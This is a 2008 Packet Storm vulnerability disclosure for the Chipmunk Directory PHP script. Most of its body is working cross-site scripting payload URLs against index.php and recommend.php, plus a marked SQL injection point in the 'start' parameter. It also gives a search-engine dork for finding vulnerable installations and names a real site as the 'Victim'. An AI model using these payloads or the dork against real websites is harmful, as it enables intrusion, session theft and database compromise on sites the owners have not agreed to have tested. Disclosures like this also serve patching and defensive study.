chipmunkdir-sqlxss.txt

2008-11-26T00:00:00
ID PACKETSTORM:72328
Type packetstorm
Reporter Pouya Server
Modified 2008-11-26T00:00:00

Description

                                        
#########################################################  
---------------------------------------------------------  
Portal Name: Chipmunk Directory  
Vendor : http://www.chipmunk-scripts.com/page.php?ID=15  
Download : http://www.chipmunk-scripts.com/directory/directory.zip  
Vulnerable Files : index.php, recommend.php  
Dork: Powered by (c) Chipmunk Directory  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS/SQL)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://www.site.com/directory/index.php?catid=1&start=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>  
http://www.site.com/directory/recommend.php?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527Pouya_Server%2527)%3E%3C/IFRAME%3E  
  
  
[SQL]:  
http://www.site.com/directory/index.php?catid=1&start=[SQL]  
---------------------------------  
  
Victim :  
http://www.chipmunk-scripts.com/directory  